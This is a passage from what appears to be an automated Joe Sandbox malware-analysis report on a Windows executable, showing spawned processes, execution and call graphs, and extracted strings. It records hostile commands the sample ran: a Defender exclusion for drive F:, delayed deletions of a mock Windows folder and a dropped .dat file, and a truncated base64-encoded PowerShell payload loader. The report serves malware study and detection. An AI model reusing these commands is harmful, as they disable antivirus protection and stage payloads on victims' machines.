                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:52
                                                                                                                                                                              Start time:06:29:53
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:53
                                                                                                                                                                              Start time:06:29:53
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:54
                                                                                                                                                                              Start time:06:29:55
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:55
                                                                                                                                                                              Start time:06:29:55
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:56
                                                                                                                                                                              Start time:06:29:55
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:timeout /t 14 /nobreak
                                                                                                                                                                              Imagebase:0x7ff64a280000
                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:57
                                                                                                                                                                              Start time:06:29:56
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat"
                                                                                                                                                                              Imagebase:0x7ff7f7ee0000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:58
                                                                                                                                                                              Start time:06:29:56
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:59
                                                                                                                                                                              Start time:06:29:57
                                                                                                                                                                              Start date:30/10/2024
                                                                                                                                                                              Path:C:\Windows\System32\timeout.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:timeout /t 16 /nobreak
                                                                                                                                                                              Imagebase:0x7ff64a280000
                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:18.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:8.1%
                                                                                                                                                                                Total number of Nodes:246
                                                                                                                                                                                Total number of Limit Nodes:3
                                                                                                                                                                                execution_graph 1407 7ff7df114b80 strlen 1408 7ff7df114bfe 1407->1408 1410 7ff7df114b95 1407->1410 1409 7ff7df114be9 strncmp 1409->1408 1409->1410 1410->1408 1410->1409 1369 7ff7df1146c6 1371 7ff7df1146f1 1369->1371 1370 7ff7df114756 1371->1370 1372 7ff7df11483b signal 1371->1372 1373 7ff7df11473b signal 1371->1373 1372->1370 1373->1371 1374 7ff7df114827 signal 1373->1374 1374->1370 1375 7ff7df115349 SetUnhandledExceptionFilter 1179 7ff7df1113d0 1182 7ff7df111180 1179->1182 1181 7ff7df1113e6 1183 7ff7df1111b0 1182->1183 1184 7ff7df1111cd 1183->1184 1185 7ff7df1111b9 Sleep 1183->1185 1189 7ff7df1111e1 1184->1189 1245 7ff7df1150d0 __acrt_iob_func 1184->1245 1185->1183 1187 7ff7df11134c _initterm 1188 7ff7df111200 1187->1188 1199 7ff7df114320 1188->1199 1189->1187 1189->1188 1198 7ff7df1112ef 1189->1198 1191 7ff7df111228 SetUnhandledExceptionFilter _set_invalid_parameter_handler 1221 7ff7df114130 1191->1221 1193 7ff7df111250 malloc 1194 7ff7df11127a 1193->1194 1193->1198 1195 7ff7df111280 strlen malloc memcpy 1194->1195 1195->1195 1196 7ff7df1112b3 1195->1196 1222 7ff7df113b39 1196->1222 1198->1181 1202 7ff7df114350 1199->1202 1220 7ff7df11433f 1199->1220 1200 7ff7df114630 1203 7ff7df114639 1200->1203 1200->1220 1201 7ff7df11454e 1206 7ff7df114661 1201->1206 1210 7ff7df114569 1201->1210 1202->1200 1202->1201 1214 7ff7df1143ca 1202->1214 1202->1220 1203->1206 1278 7ff7df1141b0 1203->1278 1204 7ff7df114672 1207 7ff7df114140 9 API calls 1204->1207 1208 7ff7df114140 9 API calls 1206->1208 1209 7ff7df11467e 1207->1209 1208->1204 1209->1191 1212 7ff7df11457a 1210->1212 1211 7ff7df1141b0 9 API calls 1211->1212 1212->1210 1212->1211 1248 7ff7df114140 1212->1248 1214->1201 1214->1204 1214->1206 1214->1210 1214->1212 1215 7ff7df114431 1214->1215 1214->1220 1215->1212 1215->1214 1216 7ff7df1141b0 9 API calls 1215->1216 1217 7ff7df1144dd 1215->1217 1218 7ff7df1144e0 1215->1218 1216->1215 1217->1218 1219 7ff7df114512 VirtualProtect 1218->1219 1218->1220 1219->1218 1220->1191 1221->1193 1223 7ff7df113b45 1222->1223 1306 7ff7df113487 1223->1306 1225 7ff7df113b64 1244 7ff7df113b73 1225->1244 1337 7ff7df115460 1225->1337 1227 7ff7df113be9 1340 7ff7df112537 malloc 1227->1340 1230 7ff7df113c20 memset 1231 7ff7df115460 memcpy 1230->1231 1232 7ff7df113ce0 1231->1232 1233 7ff7df115460 memcpy 1232->1233 1234 7ff7df113d17 1233->1234 1235 7ff7df115460 memcpy 1234->1235 1236 7ff7df113d4b 1235->1236 1347 7ff7df1122af 1236->1347 1239 7ff7df1122af 3 API calls 1240 7ff7df113d83 1239->1240 1241 7ff7df1122af 3 API calls 1240->1241 1242 7ff7df113d9c 1241->1242 1353 7ff7df11278f RtlCreateProcessParametersEx 1242->1353 1244->1198 1368 7ff7df114f60 __stdio_common_vfprintf 1245->1368 1247 7ff7df1150f3 1247->1189 1249 7ff7df11416c 1248->1249 1250 7ff7df114186 __acrt_iob_func 1249->1250 1257 7ff7df1141a3 1250->1257 1251 7ff7df11427e 1251->1212 1252 7ff7df114302 1253 7ff7df114140 4 API calls 1252->1253 1262 7ff7df114311 1253->1262 1254 7ff7df11423d VirtualQuery 1255 7ff7df1142e7 1254->1255 1254->1257 1256 7ff7df114140 4 API calls 1255->1256 1256->1252 1257->1251 1257->1252 1257->1254 1258 7ff7df114290 VirtualProtect 1257->1258 1258->1251 1259 7ff7df1142c8 GetLastError 1258->1259 1260 7ff7df114140 4 API calls 1259->1260 1260->1257 1261 7ff7df114630 1265 7ff7df1141b0 4 API calls 1261->1265 1269 7ff7df114661 1261->1269 1277 7ff7df11433f 1261->1277 1262->1261 1263 7ff7df11454e 1262->1263 1273 7ff7df1143ca 1262->1273 1262->1277 1263->1269 1270 7ff7df114569 1263->1270 1264 7ff7df114672 1266 7ff7df114140 4 API calls 1264->1266 1265->1261 1268 7ff7df11467e 1266->1268 1267 7ff7df114140 4 API calls 1267->1264 1268->1212 1269->1267 1271 7ff7df114140 4 API calls 1270->1271 1272 7ff7df1141b0 VirtualQuery VirtualProtect GetLastError VirtualProtect 1270->1272 1271->1270 1272->1270 1273->1263 1273->1264 1273->1269 1273->1270 1274 7ff7df1141b0 VirtualQuery VirtualProtect GetLastError VirtualProtect 1273->1274 1275 7ff7df1144dd 1273->1275 1273->1277 1274->1273 1276 7ff7df114512 VirtualProtect 1275->1276 1275->1277 1276->1275 1277->1212 1284 7ff7df1141c9 1278->1284 1279 7ff7df11427e 1279->1203 1280 7ff7df114302 1281 7ff7df114140 5 API calls 1280->1281 1290 7ff7df114311 1281->1290 1282 7ff7df11423d VirtualQuery 1283 7ff7df1142e7 1282->1283 1282->1284 1285 7ff7df114140 5 API calls 1283->1285 1284->1279 1284->1280 1284->1282 1287 7ff7df114290 VirtualProtect 1284->1287 1285->1280 1286 7ff7df11433f 1286->1203 1287->1279 1288 7ff7df1142c8 GetLastError 1287->1288 1289 7ff7df114140 5 API calls 1288->1289 1289->1284 1290->1286 1291 7ff7df11454e 1290->1291 1296 7ff7df114630 1290->1296 1302 7ff7df1143ca 1290->1302 1294 7ff7df114661 1291->1294 1301 7ff7df114569 1291->1301 1292 7ff7df114672 1295 7ff7df114140 5 API calls 1292->1295 1293 7ff7df1141b0 5 API calls 1293->1296 1297 7ff7df114140 5 API calls 1294->1297 1298 7ff7df11467e 1295->1298 1296->1286 1296->1293 1296->1294 1297->1292 1298->1203 1299 7ff7df1141b0 __acrt_iob_func VirtualQuery VirtualProtect GetLastError VirtualProtect 1299->1301 1300 7ff7df114140 5 API calls 1300->1301 1301->1299 1301->1300 1302->1286 1302->1291 1302->1292 1302->1294 1302->1301 1303 7ff7df1141b0 __acrt_iob_func VirtualQuery VirtualProtect GetLastError VirtualProtect 1302->1303 1304 7ff7df1144dd 1302->1304 1303->1302 1304->1286 1305 7ff7df114512 VirtualProtect 1304->1305 1305->1304 1307 7ff7df115460 memcpy 1306->1307 1308 7ff7df113510 1307->1308 1355 7ff7df11301f 1308->1355 1311 7ff7df113530 1311->1225 1313 7ff7df1136c5 1314 7ff7df115380 2 API calls 1313->1314 1315 7ff7df1136fc 1314->1315 1316 7ff7df115380 2 API calls 1315->1316 1317 7ff7df113733 1316->1317 1318 7ff7df115380 2 API calls 1317->1318 1319 7ff7df11376a 1318->1319 1320 7ff7df115380 2 API calls 1319->1320 1321 7ff7df1137a1 1320->1321 1322 7ff7df115380 2 API calls 1321->1322 1323 7ff7df1137d8 1322->1323 1324 7ff7df115380 2 API calls 1323->1324 1325 7ff7df11380f 1324->1325 1326 7ff7df115380 2 API calls 1325->1326 1327 7ff7df113846 1326->1327 1328 7ff7df115380 2 API calls 1327->1328 1329 7ff7df11387d 1328->1329 1330 7ff7df115380 2 API calls 1329->1330 1331 7ff7df1138b4 1330->1331 1332 7ff7df115380 2 API calls 1331->1332 1333 7ff7df1138eb 1332->1333 1334 7ff7df115380 2 API calls 1333->1334 1335 7ff7df113922 1334->1335 1362 7ff7df11319b 1335->1362 1338 7ff7df1153e0 memcpy 1337->1338 1339 7ff7df115496 1338->1339 1339->1227 1341 7ff7df11259b memset 1340->1341 1342 7ff7df112591 1340->1342 1344 7ff7df1125e1 1341->1344 1342->1230 1342->1244 1343 7ff7df11261c memset 1343->1344 1344->1342 1344->1343 1345 7ff7df1126a0 wcscmp 1344->1345 1346 7ff7df112665 towupper 1344->1346 1345->1344 1346->1344 1348 7ff7df11237b 1347->1348 1349 7ff7df1122ce 1347->1349 1348->1239 1349->1348 1350 7ff7df1122ea malloc 1349->1350 1351 7ff7df11231c 1350->1351 1352 7ff7df112323 memset memcpy 1350->1352 1351->1348 1352->1348 1354 7ff7df112848 1353->1354 1354->1244 1358 7ff7df113088 1355->1358 1356 7ff7df113145 wcscmp 1357 7ff7df113161 1356->1357 1356->1358 1357->1311 1359 7ff7df115380 1357->1359 1358->1356 1358->1357 1366 7ff7df1153e0 memcpy 1359->1366 1361 7ff7df1153b6 memcpy 1361->1313 1363 7ff7df1131d4 1362->1363 1365 7ff7df1131ca 1362->1365 1364 7ff7df113241 memcpy 1363->1364 1363->1365 1364->1365 1365->1311 1367 7ff7df115433 1366->1367 1367->1361 1368->1247 1376 7ff7df114950 1377 7ff7df114970 EnterCriticalSection 1376->1377 1378 7ff7df114962 1376->1378 1379 7ff7df1149b3 LeaveCriticalSection 1377->1379 1380 7ff7df11498c 1377->1380 1380->1379 1381 7ff7df1149ae free 1380->1381 1381->1379 1416 7ff7df113f90 1417 7ff7df113fa2 1416->1417 1418 7ff7df113fb2 1417->1418 1421 7ff7df1149e0 1417->1421 1420 7ff7df114005 1422 7ff7df1149ee 1421->1422 1423 7ff7df114aa0 1421->1423 1424 7ff7df1149f4 1422->1424 1425 7ff7df114a02 1422->1425 1428 7ff7df114a40 1422->1428 1423->1420 1424->1425 1426 7ff7df114ac0 InitializeCriticalSection 1424->1426 1425->1420 1426->1425 1427 7ff7df114a79 DeleteCriticalSection 1427->1425 1428->1425 1428->1427 1429 7ff7df114a68 free 1428->1429 1429->1427 1429->1429 1430 7ff7df115190 1431 7ff7df11519d __tzname __timezone __daylight 1430->1431 1437 7ff7df111010 1441 7ff7df11104b 1437->1441 1438 7ff7df11106d _set_app_type 1440 7ff7df111077 __p__fmode __p__commode 1438->1440 1439 7ff7df1110b0 1439->1440 1442 7ff7df11109c 1440->1442 1441->1438 1441->1439 1443 7ff7df1147d8 signal 1444 7ff7df1147ea signal 1443->1444 1446 7ff7df1146f1 1443->1446 1445 7ff7df114756 1444->1445 1446->1445 1447 7ff7df11483b signal 1446->1447 1448 7ff7df11473b signal 1446->1448 1447->1445 1448->1446 1449 7ff7df114827 signal 1448->1449 1449->1445 1450 7ff7df1148db 1451 7ff7df114900 1450->1451 1452 7ff7df1148f6 1450->1452 1451->1452 1453 7ff7df114917 EnterCriticalSection LeaveCriticalSection 1451->1453 1453->1452 1387 7ff7df115020 1388 7ff7df115040 1387->1388 1389 7ff7df115050 __p___argc 1388->1389 1390 7ff7df11505e 1389->1390 1391 7ff7df11507d 1390->1391 1392 7ff7df115074 _set_new_mode 1390->1392 1392->1391 1454 7ff7df113f60 1455 7ff7df113f69 1454->1455 1456 7ff7df113f6d 1455->1456 1457 7ff7df1149e0 3 API calls 1455->1457 1458 7ff7df113f85 1457->1458 1464 7ff7df115361 GetLastError 1393 7ff7df114030 1394 7ff7df11404f __acrt_iob_func 1393->1394 1398 7ff7df114f60 __stdio_common_vfprintf 1394->1398 1397 7ff7df1140b5 1398->1397 1399 7ff7df1147b0 signal 1400 7ff7df11484f signal 1399->1400 1403 7ff7df1146f1 1399->1403 1401 7ff7df114863 1400->1401 1402 7ff7df114756 1403->1402 1404 7ff7df11483b signal 1403->1404 1405 7ff7df11473b signal 1403->1405 1404->1402 1405->1403 1406 7ff7df114827 signal 1405->1406 1406->1402 1475 7ff7df1113f0 1476 7ff7df111180 34 API calls 1475->1476 1477 7ff7df111406 1476->1477

                                                                                                                                                                                Callgraph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                callgraph 0 Function_00007FF7DF112537 56 Function_00007FF7DF113E68 0->56 60 Function_00007FF7DF113E74 0->60 1 Function_00007FF7DF113E38 2 Function_00007FF7DF117338 3 Function_00007FF7DF113B39 3->0 10 Function_00007FF7DF115550 3->10 28 Function_00007FF7DF113F30 3->28 38 Function_00007FF7DF112386 3->38 39 Function_00007FF7DF113487 3->39 41 Function_00007FF7DF11278F 3->41 50 Function_00007FF7DF115460 3->50 81 Function_00007FF7DF1122AF 3->81 91 Function_00007FF7DF114F00 3->91 4 Function_00007FF7DF112139 72 Function_00007FF7DF111599 4->72 88 Function_00007FF7DF1115FA 4->88 5 Function_00007FF7DF114140 5->5 6 Function_00007FF7DF114F40 5->6 16 Function_00007FF7DF114C20 5->16 52 Function_00007FF7DF114D60 5->52 74 Function_00007FF7DF114CA0 5->74 83 Function_00007FF7DF1141B0 5->83 5->91 7 Function_00007FF7DF113E44 8 Function_00007FF7DF115349 9 Function_00007FF7DF111450 21 Function_00007FF7DF115520 10->21 49 Function_00007FF7DF113E5C 10->49 11 Function_00007FF7DF113E50 12 Function_00007FF7DF113F50 13 Function_00007FF7DF114950 14 Function_00007FF7DF115150 15 Function_00007FF7DF11301F 17 Function_00007FF7DF114320 17->5 17->74 17->83 17->91 18 Function_00007FF7DF115020 19 Function_00007FF7DF114020 20 Function_00007FF7DF113E20 22 Function_00007FF7DF117629 23 Function_00007FF7DF113E2C 24 Function_00007FF7DF111430 25 Function_00007FF7DF114130 26 Function_00007FF7DF114030 51 Function_00007FF7DF114F60 26->51 27 Function_00007FF7DF114E30 29 Function_00007FF7DF111130 84 Function_00007FF7DF114FB0 29->84 30 Function_00007FF7DF114B30 31 Function_00007FF7DF117635 32 Function_00007FF7DF11767B 33 Function_00007FF7DF111180 33->3 33->17 33->25 33->28 70 Function_00007FF7DF1150D0 33->70 106 Function_00007FF7DF114AE0 33->106 34 Function_00007FF7DF113E80 35 Function_00007FF7DF112180 35->72 77 Function_00007FF7DF1120A7 35->77 78 Function_00007FF7DF1118AB 35->78 36 Function_00007FF7DF115380 108 Function_00007FF7DF1153E0 36->108 37 Function_00007FF7DF114B80 39->15 39->36 39->50 73 Function_00007FF7DF11319B 39->73 40 Function_00007FF7DF111488 41->1 41->7 41->11 42 Function_00007FF7DF111A8F 58 Function_00007FF7DF11146C 42->58 43 Function_00007FF7DF115090 44 Function_00007FF7DF113F90 107 Function_00007FF7DF1149E0 44->107 45 Function_00007FF7DF115190 46 Function_00007FF7DF115291 47 Function_00007FF7DF117393 48 Function_00007FF7DF117457 62 Function_00007FF7DF1154C0 50->62 50->108 53 Function_00007FF7DF113F60 53->107 54 Function_00007FF7DF115361 55 Function_00007FF7DF111D67 55->9 57 Function_00007FF7DF114068 57->51 59 Function_00007FF7DF117572 61 Function_00007FF7DF112FBC 63 Function_00007FF7DF117BC0 64 Function_00007FF7DF1146C6 65 Function_00007FF7DF11B2C8 66 Function_00007FF7DF111ECC 66->40 67 Function_00007FF7DF1175CE 68 Function_00007FF7DF1113D0 68->33 69 Function_00007FF7DF1140D0 69->51 70->51 71 Function_00007FF7DF1175D1 75 Function_00007FF7DF114DA0 76 Function_00007FF7DF114FA0 77->55 77->66 92 Function_00007FF7DF111902 77->92 110 Function_00007FF7DF111DE9 77->110 79 Function_00007FF7DF1119AC 80 Function_00007FF7DF1172AE 82 Function_00007FF7DF1147B0 82->25 83->5 83->16 83->52 83->74 83->83 83->91 85 Function_00007FF7DF1114B4 85->40 86 Function_00007FF7DF1150B4 87 Function_00007FF7DF11B2F8 88->9 89 Function_00007FF7DF11B300 90 Function_00007FF7DF114100 90->51 93 Function_00007FF7DF117507 94 Function_00007FF7DF11220B 94->72 94->78 111 Function_00007FF7DF111CED 94->111 95 Function_00007FF7DF114110 95->51 96 Function_00007FF7DF111410 96->43 97 Function_00007FF7DF111010 97->12 98 Function_00007FF7DF111B11 98->85 99 Function_00007FF7DF117314 100 Function_00007FF7DF1147D8 101 Function_00007FF7DF1148DB 102 Function_00007FF7DF1176DB 103 Function_00007FF7DF11B2E0 104 Function_00007FF7DF1140E0 104->51 105 Function_00007FF7DF114CE0 107->25 108->4 108->94 109 Function_00007FF7DF1123E7 109->1 109->20 109->23 111->42 111->79 111->92 111->98 112 Function_00007FF7DF1177EE 113 Function_00007FF7DF1140F0 113->51 114 Function_00007FF7DF1113F0 114->33 115 Function_00007FF7DF1177F6

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_set_invalid_parameter_handlermemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 959198572-0
                                                                                                                                                                                • Opcode ID: ad534f03d43127013cf47a264d67721b1974f1ccd85bdad24da990dc34225ab6
                                                                                                                                                                                • Instruction ID: c5715bc92395aec459e2e566fc997c1152f65e00f37d72f5ccaf8a077beb6b8a
                                                                                                                                                                                • Opcode Fuzzy Hash: ad534f03d43127013cf47a264d67721b1974f1ccd85bdad24da990dc34225ab6
                                                                                                                                                                                • Instruction Fuzzy Hash: CE511436A19E9681FA11BB16F8402FDE2AEAF45B90FD44137C90C57795DF2EE8458330

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                • \??\C:\Windows\System32\cmd.exe, xrefs: 00007FF7DF113D08
                                                                                                                                                                                • cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3, xrefs: 00007FF7DF113D3C
                                                                                                                                                                                • EXPLORER.EXE, xrefs: 00007FF7DF113BDA
                                                                                                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 00007FF7DF113CD1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: C:\Windows\System32\cmd.exe$EXPLORER.EXE$\??\C:\Windows\System32\cmd.exe$cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3
                                                                                                                                                                                • API String ID: 0-109750451
                                                                                                                                                                                • Opcode ID: a10ae0be060578b6cb4c84982f43d19957dd19e300a895a9e27a70485bfde872
                                                                                                                                                                                • Instruction ID: e228c7d1aeca903e38a54488552ee777ebf199b04d4552223ceede2019e5eb65
                                                                                                                                                                                • Opcode Fuzzy Hash: a10ae0be060578b6cb4c84982f43d19957dd19e300a895a9e27a70485bfde872
                                                                                                                                                                                • Instruction Fuzzy Hash: F561FC75A08FC699EB20AB60F8043DD6369E784389FC04136E90D4BB99EF7ED245C760

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: mallocmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2882185209-0
                                                                                                                                                                                • Opcode ID: 1728906ea9c6d5a83ab48ce739b254bb0b67720187bf5ca7746ebd0e7883129f
                                                                                                                                                                                • Instruction ID: c0f4e59c07c13ba961d982e813597b2a4f902b0f57baa0fdd620c0254a44a4a2
                                                                                                                                                                                • Opcode Fuzzy Hash: 1728906ea9c6d5a83ab48ce739b254bb0b67720187bf5ca7746ebd0e7883129f
                                                                                                                                                                                • Instruction Fuzzy Hash: 36512876600BC689EB30DF25E8883ED63A4F759788F804136DE1D4BB99EF39D6448760

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.2029869177.00007FF7DF111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DF110000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.2029080815.00007FF7DF110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030245412.00007FF7DF116000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030261792.00007FF7DF117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030276158.00007FF7DF11B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.2030289213.00007FF7DF11E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7df110000_app64.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateParametersProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 946617964-0
                                                                                                                                                                                • Opcode ID: e681a26ef7d4c24700de20a783a05b463d979f4231738b61a62c4fca5bd464eb
